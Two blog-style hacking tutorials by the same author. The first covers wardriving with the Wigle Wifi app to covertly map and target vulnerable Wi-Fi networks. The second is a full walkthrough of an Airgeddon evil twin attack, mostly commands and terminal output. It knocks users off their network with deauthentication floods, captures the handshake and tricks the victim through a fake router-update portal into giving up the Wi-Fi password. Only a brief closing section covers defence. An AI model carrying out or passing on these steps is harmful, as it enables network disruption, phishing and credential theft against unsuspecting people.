article-2670710-1F25BA8000000578-389_964x488

Tossing an old Android smartphone with a decent battery into your hacking kit can let you quickly map hundreds of vulnerable networks in your area just by walking or driving by them. The practise of wardriving uses a Wi-Fi network card and GPS receiver to stealthily discover and record the location and settings of any nearby routers, and your phone allows you to easily discover those with security issues.

Introduction to Wardriving

In 2005, hacker Albert Gonzalez and friends were wardriving along a Miami highway, looking for vulnerable WEP networks. They realized that major retailers like Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx, and A.J. Wright were using insecure WEP-encrypted wireless networks in their retail locations. Worse, these stores used the network to service the in-store credit card payment systems.

What happened next was one of the greatest thefts of customer credit and debit card information in history.

Albert and his accomplices cracked the passwords of WEP networks in stores owned by TJX Companies, soon pivoting into the Massachusetts-based corporate network and planting a packet sniffer. This sniffer siphoned 90 million customer credit and debit cards to a server in Ukraine, which then sold them on the darknet for around $11 million. Although it was clear that TJX was aware of the security issues around WEP network encryption, they thought it was unlikely someone would notice.

Wardriving as a concept has been around since the ’90s, fueled by programs like NetStumbler. It turns out, you can do a lot with the data created from wardriving, and since then, everyone from hackers to location providers like Skyhook scan and log Wi-Fi networks worldwide.

In the early 2000s, Google got into the wardriving game and began collecting geotagged Wi-Fi data early in its Google Street View initiative. Led by engineer Marius Milner, the creator of NetStumbler, Google Street View cars began logging the Wi-Fi networks of people around the world, creating a directory of wireless networks tied to addresses and Google Maps imagery. This data also included information from networks which had been left unencrypted, causing Google a lot of legal trouble over privacy concerns and resulting in over $7 million in fees.

More recently, the US military, keen to avoid jamming of GPS (which causes drones to become confused and predictable), have been developing NAVSOP, or Navigation via Signals of Opportunity, as a way of determining your position from random nearby signals even when communication from traditional navigation systems have been cut off.

Wardriving is a Tactical Tool

In this guide, we will be using an Android adaptation of Wigle (Wireless Geographic Logging Engine), which will harvest our data and plug it into the Wigle.net database. Why search only your data when thousands of other people have already contributed?

Wigle Wifi Wardriving, a free Android app, shows the location, channel, encryption, and other important qualities of a Wi-Fi network without ever needing to connect to it.

First started in 2001, the Wigle.net website is a collective searchable database of all discovered networks that have been contributed by wardrivers over the past decade. With over 323,446,100 networks mapped to date, searching Wigle.net is a powerful way to perform a database correlation attack. You can also download your entire personal database at any time through the app, as it’s stored on the Wigle.net server if you choose to upload it.

Our focus here will be on creating and linking a Wigle.net account with the Wigle Wifi Wardriving Android app (which we’ll just call “Wigle Wifi” from now on) to allow us to build our databases of wireless networks, as well as search a crowdsourced database when needed.

Because Wigle Wifi uses easily available hardware, no specialized computer is needed to conduct a detailed analysis of a target. Even an old Android phone will support the Wigle Wifi app. It’s subtle and can be used with no trace, so this method can be used in any high-security location discreetly.

Like cellular triangulation, Wigle Wifi locates networks by combining multiple sightings of an access point. These sightings include precise GPS and signal strength measurements used to calculate the likely position of the router, often down to a few meters. From a signals intelligence perspective, this gives us the ability to run passive, undetectable reconnaissance against a target, and the query to a massive database of geolocated APs contributed by other wardrivers to track down probe frames.

Step 1. Setting Up a Wigle Account

Wigle Wifi is tightly integrated with the Wigle.net database and website. So before we even install the Wigle Wifi app, we’ll want to create a Wigle.net account.

If you’re on your computer, just navigate to Wigle.net in your browser and click on the “Login” button up top to show the “Register” option. In your phone’s browser, after going to the website, tap on the hamburger icon, select “Login,” then “Register.”

Fill out the fields to create your free account. After that, remember the user name and password so you can input it into the Wigle Wifi app later. This will allow you to upload to the site and retrieve your entire database.

Step 2. Installing Wigle Wifi

Wigle Wifi is available in the Google Play Store, so just visit that link to download and install it onto your Android device. You need Android 4.0 and higher, so this will literally work on any smartphone you have collecting dust around your place.

Step 3. Running Wigle Wifi on Android

Once you’ve got the app installed, open it to the main screen. Wigle Wifi is an aggressive app and will override settings to turn the Wi-Fi card on while it’s running, so don’t be surprised if your Wi-Fi turns on with Wigle Wifi running in the background.

After granting the app all of the required permissions, a run should start right away. If not, make sure you’re on the “Network List” page (via the hamburger icon), then tap on the three-dots icon in the top right. Select “Scan On” to begin scanning through channels and collecting wireless information. This will immediately begin displaying wireless networks in the area.

The “Network List” screen with scanning off.

Keep in mind, Wigle Wifi will consume extra power while scanning and logging networks. The more often you run it in the background, though, the better location accuracy you’ll get. You can go back to the same three-dot menu and select “Scan Off” when you don’t need it.

Step 4. Adjusting Wigle Wifi’s Settings

To adjust the settings, you can access the menu by tapping the hamburger icon on the top left and selecting the “Settings” option. At the top of this menu, you can enter your Wigle.net login and password.

Here, you can also adjust the display and run options, as well as specific options like how to increase or decrease scan times in response to changes in speed. Increasing the number of scans will drain the battery faster but capture more networks if you’re moving quickly.

Step 5. Backing Up Your Runs from Wigle Wifi

Make sure you’ve entered your Wigle.net login at the top of the “Settings” menu item, then back up your data in the app by tapping the “Upload to Wigle.net” button on the Network List page. When you upload your runs, you’ll always be able to view and download them later on Wigle.net.

Here, we see many runs with number of networks and other information displayed.

Step 6. Using the Wigle.net Website

To easily search your entire database, as well as other contributed data, we’ll open Wigle.net in a browser. You can do this on your phone’s browser or your computer’s browser.

There are many ways to search for information on Wigle.net. In the Wigle Wifi app, you can search for nearby networks, but on the website, you can search the entire database of contributions. The most obvious settings are under the “Search” function that appears after you log into your account.

Searching the Wigle.net database for a network.

For a more visual overview of the target, check out the “Maps” section. You can type in an address and adjust overlay filters to create a graphical map of the target with wireless data overlayed.

Lots of people wardrive, and there is a lot of information already out there.

Selecting on a network will give you more information about it. You can filter networks with the list of options on the right of the screen. Look up your address and see if your router has been logged!

Step 7. Searching Local Queries in Wigle Wifi’s Map

If you want to search a wardriving run on your phone rather than Wigle.net, you can do so (or watch results appear on the map live) by tapping the “Map” menu option. This will open a map of the area pinned to your current location and display nearby networks. Tapping on a network will bring up information about the manufacturer, the security used, and the channel and BSSID. Below, we see some mapped results from a local run.

Querying the local database on the Wigle Wifi app.

You can see how many networks you’ve collected in a run by selecting the “Dashboard” option in the menu.

Wigle Wifi lets you build your own database of networks around you.
Data from Recon Runs in Wigle Wifi
Maybe you want to work with your data directly. Navigating to the “Database” tab on the Wigle app shows the various options for exporting data from Wigle Wifi.

If you want to pull everything you’ve ever uploaded into one file, you can select “Import Observed.” Doing this pulls from Wigle.net, so be prepared to wait for a little for the download if you have a ton of networks. You can also use this tab to search network runs, although sometimes this functionality can be a little buggy.

The Wigle team also shared a few more tips with us for accessing your data: First, you can access the runs from your SD card or internal memory; Each run is archived upon upload, and the SQLite database can be backed up and accessed. Second, the transid on your uploads page gives you a link to a KML representation of your run with bad and incomplete data points filtered out for the most part.

Step 9. Contributing to the Big Picture

Wigle.net works because of people contributing. If you feel like adding to the giant pool of knowledge that is Wigle.net (or you’ve got a competitive streak), consider adding to the community database to build a better OSINT tool for fellow wireless researchers.

There is a thriving community of wardrivers who compete to discover the most networks, and anyone can join! You can even create a team to rank up against other wardriving teams. With some users having discovered millions of new networks, competition is fierce for a place in wardriving history. Check out the “Rankings” menu item in the app.

It currently takes finding over 100,000 new (previously unknown to Wigle.net) Wi-Fi networks just to crack the top 500 users on Wigle’s leaderboard, so be prepared to do some serious hunting to earn street cred in the wardriving community!

Conclusion

Whether you’re wardriving for tactical network reconnaissance, to build a database of your city’s Wi-Fi networks, or just to contribute to an exciting project, Wigle Wifi is a great tool to quickly learn about the wireless world around you.

Tactical wardriving, or warwalking, can give you a picture of a target’s wireless infrastructure.

If you have any questions, ask them here on Instagram @iamshubhamkumar__.

Posted by Shubham ;)

 


hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack.1280x600

While Wi-Fi networks can be set up by smart IT people, that doesn’t mean the users of the system are similarly tech-savvy. We’ll demonstrate how an evil twin attack can steal Wi-Fi passwords by kicking a user off their trusted network while creating a nearly identical fake one. This forces the victim to connect to the fake network and supply the Wi-Fi password to regain internet access.

While a more technical user might spot this attack, it’s surprisingly effective against those not trained to look for suspicious network activity. The reason it’s so successful is that most users don’t know what a real firmware update looks like, leading to confusion in recognizing that an attack is in progress.

What Is an Evil Twin Attack

An evil twin attack is a type of Wi-Fi attack that works by taking advantage of the fact that most computers and phones will only see the “name” or ESSID of a wireless network. This actually makes it very hard to distinguish between networks with the same name and same kind of encryption. In fact, many networks will have several network-extending access points all using the same name to expand access without confusing users.

If you want to see how this works, you can create a Wi-Fi hotspot on your phone and name it the same as your home network, and you’ll notice it’s hard to tell the difference between the two networks or your computer may simply see both as the same network. A network sniffing tool like Wigle Wifi on Android or Kismet can clearly see the difference between these networks, but to the average user, these networks will look the same.

This works great for tricking a user into connecting if we have a network with the same name, same password, and same encryption, but what if we don’t know the password yet? We won’t be able to create a network that will trick the user into connecting automatically, but we can try a social engineering attack to try to force the user to give us the password by kicking them off the real network.

Using a Captive Portal Attack

In a captive portal-style evil twin attack, we will use the Airgeddon wireless attack framework to try to force the user to connect to an open network with the same name as the network they trust. A captive portal is something like the screen you see when connecting to an open network at a coffee shop, on a plane, or at a hotel. This screen that contains terms and conditions is something people are used to seeing, and we’ll be using that to our advantage to create a phishing page that looks like the router is updating.

The way we’ll trick the victim into doing this is by flooding their trusted network with de-authentication packets, making it impossible to connect to the internet normally. When confronted with an internet connection that refuses to connect and won’t allow any internet access, the average irritated user will discover an open Wi-Fi network with the same name as the network they are unable to connect to and assume it is related to the problem.

Upon connecting to the network, the victim will be redirected to a phishing page explaining that the router has updated and requires a password to proceed. If the user is gullible, they’ll enter the network password here, but that’s not where the fun stops. If the victim gets irritated by this inconvenience and types the wrong password, we’ll need to make sure we can tell a wrong password from the right one. To do this, we’ll capture a handshake from the network first, so we can check each password the user gives us and tells when the correct one is entered.

Technologically Assisted Social Engineering

In order for this attack to work, a few key requirements need to be met. First, this attack requires a user to do some ignorant things. If the target you are selecting is known for being tech-savvy, this attack may not work. An advanced user, or anyone with any cybersecurity awareness training, will spot this attack in progress and very possibly be aware that it is a relatively close-ranged attack. Against a well-defended target, you can expect this attack to be detected and even localized to find you.

Second, a victim must be successfully authenticated from their network, and be frustrated enough to join a totally unknown open network that just appeared out of nowhere and has the same name of the network they trust. Further, attempting to connect to this network (on macOS) even yields a warning that the last time the network was connected to, it had a different kind of encryption.

Finally, the victim must enter the network password into the sometimes sketchy-looking phishing page they are redirected to after joining the open network the attacker has created. There are a lot of clues that could tip a sharp user off to the fact that this page, including the wrong language, a wrong brand of the router (if the phishing page mentions it), or misspellings and Engrish in the text of the page. Since router pages usually look pretty ugly, these details may not stand out to anyone unfamiliar with what their router’s admin page looks like.

Step 1. Make Sure You Have Everything

To prepare our evil twin access point attack, we’ll need to be using Kali Linux or another supported distro. Quite a few distributions are supported, and you can check out the Airgeddon GitHub page for more about which Airgeddon will work with.

You can use a Raspberry Pi running Kali Linux for this with a wireless network adapter, but you’ll need to have access to the GUI and not be SSHed into the Pi, since you’ll need to be able to open and navigate multiple windows in this multi-bash script.

Finally, you’ll need a good wireless network adapter for this. In our tests, we found that the TP-Link WN722N v1 and Panda Wireless PAU07 cards performed well with these attacks. You can find more information about choosing a good wireless network adapter at the link below.

Step 2. Install Airgeddon

To start using the Airgeddon wireless attack framework, we’ll need to download Airgeddon and any needed programs. The developer also recommends downloading and installing a tool called CCZE to make the output easier to understand. You can do so by typing apt-get install ccze a terminal window.

~# apt-get install ccze

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
The following NEW packages will be installed:
  ccze
0 upgraded, 1 newly installed, 0 to remove and 1772 not upgraded.
Need to get 77.2 kB of archives.
After this operation, 324 kB of additional disk space will be used.
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 ccze amd64 0.2.1-4+b1 [77.2 kB]
Fetched 77.2 kB in 1s (77.4 kB/s)
Selecting previously unselected package ccze.
(Reading database ... 411785 files and directories currently installed.)
Preparing to unpack .../ccze_0.2.1-4+b1_amd64.deb ...
Unpacking ccze (0.2.1-4+b1) ...
Setting up ccze (0.2.1-4+b1) ...
Processing triggers for man-db (2.8.5-2) ...

Next, we’ll install Airgeddon with git clone.

~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Cloning into 'airgeddon'...
remote: Enumerating objects: 6940, done.
remote: Total 6940 (delta 0), reused 0 (delta 0), pack-reused 6940
Receiving objects: 100% (6940/6940), 21.01 MiB | 10.31 MiB/s, done.
Resolving deltas: 100% (4369/4369), done.

Then change directories and start Airgeddon with the following commands.

~# cd airgeddon
~/airgeddon# sudo bash ./airgeddon.sh

If you see the alien spaceship, you know you’re ready to hack.

************************************ Welcome ************************************

Welcome to airgeddon script v10.0

                   .__                          .___  .___
           _____   |__|______  ____    ____   __| _/__| _/____   _____
            \__  \ |  \_  __ \/  ___\_/ __ \ / __ |/ __ |/  _ \ /     \
             / __ \|  ||  | \/  /_/  >  ___// /_/ / /_/ (  <_> )   |   \
            (____  /__||__|   \___  / \___  >____ \____ |\____/|___|   /
                 \/          /_____/      \/     \/    \/           \/

                               Devloped by v1s1t0r

                          *        .  _.---._          .
                                *  . '       ' .  .
                               _.-~=============~-._ *
                            . (_____________________)        *
                             *     \___________/        .

Step 3. Configure Airgeddon

Press Enter to check the various tools the Airgeddon framework relies on. If you’re missing any (it’ll say “Error” next to them), you can hit Y and Enter at the prompt to try and auto-install anything missing, but that generally doesn’t work.

Instead, open a new terminal window and type apt-get install tool, substituting “tool” for the name of the missing tool. If that doesn’t work, you can also try sudo pip install tool. You should install all the tools, otherwise, you may experience problems during your attack, especially if you are missing dnsspoof.

*********************************** Welcome ************************************
This script is only for educational purposes. Be good boyz&girlz!
Use it only on your own networks!!

Accepted bash version (5.0.3(1)-release). Minimum required version: 4.2

Root permissions successfully detected

Detecting resolution... Detected!: 1408x1024

Known compatible distros with this script:
"Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo" "Kali" "Kali arm" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo" "Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax"

Detecting system...
Kali Linux

Let's check if you have installed what script needs
Press [Enter] key to continue...

Essential tools: checking...
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional tools: checking...
sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

Update tools: checking...
curl .... Ok

Your distro has all necessary essential tools. Script can continue...
Press [Enter] key to continue...

When you have all of the tools, proceed to the next step by pressing Enter. Next, the script will check for internet access so it can update itself if a newer version exists.

The script will check for internet access looking for a newer version. Please be patient...

The script is already in the latest version. It doesn't need to be updated
Press [Enter] key to continue...

When that is done, press Enter to select the network adapter to use. Press the number on your keyboard that correlates to the network adapter in the list, then Enter.

***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Intel Corporation 82540EM
2.  wlan0 // 2.4Ghz // Chipset: Atheros Communications, Inc. AR9271 802.11n
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review
---------
>

After we select our wireless network adapter, we’ll proceed to the main attack menu.

***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience
---------
>

Press 2 and Enter to put your wireless card into monitor mode. Next, select option 7 and Enter for the “Evil Twin attacks” menu, and you’ll see the submenu for this attack module appear.

**************************** Evil Twin attacks menu ****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet
---------
>

Step 4. Select the Target

Now that we’re in our attack module, select option 9 and Enter for the “Evil Twin AP attack with a captive portal.” We’ll need to explore for targets, so press Enter, and you’ll see a window appear that shows a list of all detected networks. You’ll need to wait for a little to populate a list of all the nearby networks.

An exploration looking for targets is going to be done...
Press [Enter] key to continue...

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface qlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
Exploring for targets

CH 12 ][ Elapsed: 12 s ][ 2019-12-13 05:28
BSSID          PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
██████████████ -59        9        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -58        5        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -80       12        0    0  11  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -79       14        0    0   6  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -82        6        0    0   1  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -83        6        1    0   2  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -85        2        0    0   6  54e. WPA2 CCMP   PSK  ██████████████

BSSID            STATION            PWR   Rate     Lost    Frames  Probe
(not associated) 00:7E:56:97:E9:B0  -68    0 - 1     29         5
██████████████   E8:1A:1B:D9:75:0A  -38    0 -24e     0         1
██████████████   62:38:E0:34:6A:7E  -58    0 - 0e     0         1
██████████████   DC:3A:5E:1D:3E:29  -57    0 -24    148         5

After it runs for about 60 seconds, exit out of the small window, and a list of targets will appear. You’ll notice that networks with someone using them appear in yellow with an asterisk next to them. This is essential since you can’t trick someone into giving you the password if no one is on the network in the first place.

**************************** Select target ****************************

  N.      BSSID      CHANNEL  PWR   ENC     ESSID
------------------------------------------------------
  1)* ██████████████    11    41%   WPA2   ██████████████
  2)* ██████████████    11    20%   WPA2   ██████████████
  3)  ██████████████     6    15%   WPA2   ██████████████
  4)  ██████████████     6    19%   WPA2   ██████████████
  5)  ██████████████     2    17%   WPA2   ██████████████
  6)  ██████████████     1    18%   WPA2   ██████████████
  7)  ██████████████    11    42%   WPA2   ██████████████

(*) Network with clients
------------------------------------------------------
Select target network:

Select the number of the target you wish to attack, and press Enter to proceed to the next screen.

Step 5. Gather the Handshake

Now, we’ll select the type of de-authentication attack we want to use to kick the user off their trusted network. I recommend the second option, “Deauth aireplay attack,” but different attacks will work better depending on the network.

Press Enter once you’ve made your selection, and you’ll be asked if you’d like to enable DoS pursuit mode, which allows you to follow the AP if it moves to another channel. You can select yes (Y) or no (N) depending on your preference, and then press Enter. Finally, you’ll select N for using an interface with internet access. We won’t need to for this attack, and it will make our attack more portable to not need an internet source.

Handshake file selected: None
Selected internet interface: None

Select an option from menu:
---------
0.  Return to Evil Twin attacks menu
---------
1.  Deauth / disassoc amok mdk3 attack
2.  Deauth aireplay attack
3.  WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof

Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N

Next, it will ask you if you want to spoof your MAC address during the attack. In this case, I chose N for “no.”

Now, if we don’t already have a handshake for this network, we’ll have to capture one now. Be VERY careful not to accidentally select Y for “Do you already have a captured Handshake file?” if you do not actually have a handshake. There is no clear way to go back to the script without restarting if you make this mistake.

Since we don’t yet have a handshake, type N for no, and press Enter to begin capturing.

******************* Evil Twin AP attack with captive portal *******************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz
Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: None
---------
*Hint* Sslstrip technique is not infallible. It depends on many factors and not always work. Some browsers such as Mozilla Firefox latest versions are not affected
---------

Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured Handshake file

If you don't have a captured Handshake file from the target network you can get it now
---------

Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N]
N

Once the capture process has started, a window with red text sending deauth packets and a window with white text listening for handshakes will open. You’ll need to wait until you see “WPA Handshake:” and then the BSSID address of your targeted network. In the example below, we’re still waiting for a handshake.

Once you see that you’ve got the handshake, you can exit out of the Capturing Handshakewindow. When the script asks you if you got the handshake, select Y, and save the handshake file. Next, select the location for you to write the stolen password to, and you’re ready to go to the final step of configuring the phishing page.

Step 6. Set Up the Phishing Page

In the last step before launching the attack, we’ll set the language of the phishing page. The page provided by Airgeddon is pretty decent for testing out this style of attack. In this example, we’ll select 1 for English. When you’ve made your selection, press Enter, and the attack will begin with six windows opening to perform various functions of the attack simultaneously.

Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: /root/handshake-██████████████.cap

Choose the language in which network clients will see the captive portal:
---------
0.  Return to Evil Twin attacks menu
---------
1.  English
2.  Spanish
3.  French
4.  Catalan
5.  Portuguese
6.  Russian
7.  Greek
8.  Italian
9.  Polish
10. German
---------
*Hint* On Evil Twin attack with BeEF intergrated, in addition to obtaining keys using sniffing techniques, you can try to control the client's browser launching numerous attack vectors. The success of these will depend on many factors such as the kind of client's browser and its version
---------

Step 7. Capture Network Credentials

With the attack underway, the victim should be kicked off of their network and see our fake one as the only seemingly familiar option. Be patient, and pay attention to the network status in the top right window. This will tell you when a device joins the network, allowing you to see any password attempts they make when they’re routed to the captive portal.

When the victim joins your network, you’ll see a flurry of activity like in the picture below. In the top-right corner, you’ll be able to see any failed password attempts, which are checked against the handshake we gathered. This will continue until the victim inputs the correct password, and all of their internet requests (seen in the green text box) will fail until they do so.

When the victim caves and finally enters the correct password, the windows will close except for the top-right window. The fake network will vanish, and the victim will be free to connect back to their trusted wireless network.

The credentials should be displayed in the top-right Control screen, and you should copy and paste the password into a file to save, in case the script doesn’t save the file correctly. This sometimes happens, so make sure not to forget this step or you might lose the password you just captured.

Control

       Evil Twin AP Info // BSSID: ██████████████ // Channel: 11 // ESSID: ██████████████

       Online time
       00:01:40

       Password captured successfully:

/tmp/ag.control.sh: line 37: ${log_path}: ambiguous redirect
       ██████████████

       The password was saved on file: [/root/evil_twin_captive_portal_password-██████████████.██████.txt

       Press [Enter] on the main script window to continue, this window will be closed

After this, you can close the window, and close down the tool by pressing Ctrl + C. If we get a valid credential in this step, then our attack has worked, and we’ve got the Wi-Fi password by tricking the user into submitting it to our fake AP’s phishing page!

Defending Against an Evil Twin AP Attack

The best way of defending against an evil twin attack is to know about the tactic, and know that the signs of one should make you highly suspicious. If you abruptly lose the ability to connect to your trusted network and suddenly see an open wireless network with the same name, these are neither a coincidence nor a normal turn of events.

Never connect to an unknown wireless network pretending to be yours, especially one without encryption. If you suspect your router is actually updating, turn off your Wi-Fi and plug into the router’s Ethernet directly to see what the problem is.

Thanks for reading this guide to evil twin AP attacks! If you have any questions or comments, feel free to leave a comment or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)